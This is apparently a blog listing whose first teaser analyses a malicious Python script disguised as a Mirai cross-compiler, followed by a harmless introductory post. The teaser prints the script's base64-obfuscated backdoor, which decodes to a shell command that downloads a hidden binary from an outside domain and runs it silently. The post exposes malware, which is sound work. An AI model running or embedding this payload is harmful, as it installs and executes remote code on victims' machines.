Recently, a malicious Python script claiming to be a “cross-compiler” for things like Mirai was brought to my attention. I decided I would look into such a thing as it seemed odd that someone would spread malware that way. Upon analyzation of the script, I came across this beautiful snippet: checkbinaries = "Y2QgL3RtcDsgd2dldCAtcSBodHRwOi8vc3Vja215YXNzLmdhLy54ICA7ICBjdXJsIC1PIGh0dHA6Ly9zdWNrbXlhc3MuZ2EvLnggIDtjaG1vZCAreCAueDsgbm9odXAgLi8ueCA8L2Rldi9udWxsID4vZGV2L251bGwgMj4mMTtybSAtcmYgLng=" rebinaries = str(base64.b64decode(checkbinaries)) run(rebinaries) Ah yes, what a great little backdoor! Let’s see what that base64 translates to… Read more ...

Hello! This is the first blog post here, and I will be getting around to making a post that is actually constructive soon. In the meantime, here’s a picture of a cat: Read more ...